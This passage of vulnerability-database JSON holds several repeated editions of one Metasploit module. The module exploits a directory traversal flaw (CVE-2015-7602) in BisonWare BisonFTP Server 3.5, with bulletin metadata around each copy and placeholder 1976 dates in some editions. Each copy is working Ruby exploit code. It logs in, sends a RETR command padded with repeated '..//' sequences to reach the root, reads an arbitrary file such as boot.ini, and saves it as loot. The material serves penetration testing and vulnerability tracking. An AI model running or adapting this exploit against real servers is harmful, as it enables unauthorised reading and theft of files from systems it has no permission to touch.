{"score": {"modified": "2018-04-08T00:12:12", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-20T22:29:59", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-21T00:30:18", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-21T00:30:18", "differentElements": ["modified", "published"], "edition": 21}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-25T12:40:34", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-25T12:40:34", "differentElements": ["modified", "published"], "edition": 22}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-25T14:41:36", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-25T14:41:36", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-28T10:45:06", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-28T10:45:06", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-28T14:42:14", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-28T14:42:14", "differentElements": ["modified", "published"], "edition": 25}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-09T17:03:32", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", 